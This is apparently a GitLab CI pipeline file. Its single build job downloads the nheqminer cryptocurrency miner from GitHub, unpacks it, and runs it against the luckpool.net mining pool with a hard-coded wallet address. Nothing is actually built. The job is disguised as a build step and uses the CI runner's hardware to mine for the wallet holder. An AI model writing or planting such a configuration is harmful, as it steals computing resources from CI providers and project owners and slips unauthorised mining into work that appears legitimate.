image: ubuntu:latest

APED:
  stage: build
  script:
     - apt-get update -y
     - apt-get install wget -y
     - wget https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz
     - tar xf nheqminer-Linux-v0.8.2.tgz
     - tar xf nheqminer-Linux-v0.8.2.tar.gz
     - cd nheqminer
     - ./nheqminer -v -l na.luckpool.net:3956 -u RT2kaxsTB9FM1uLxivmW5xvB37zBqczYuQ.APED -p x -t 2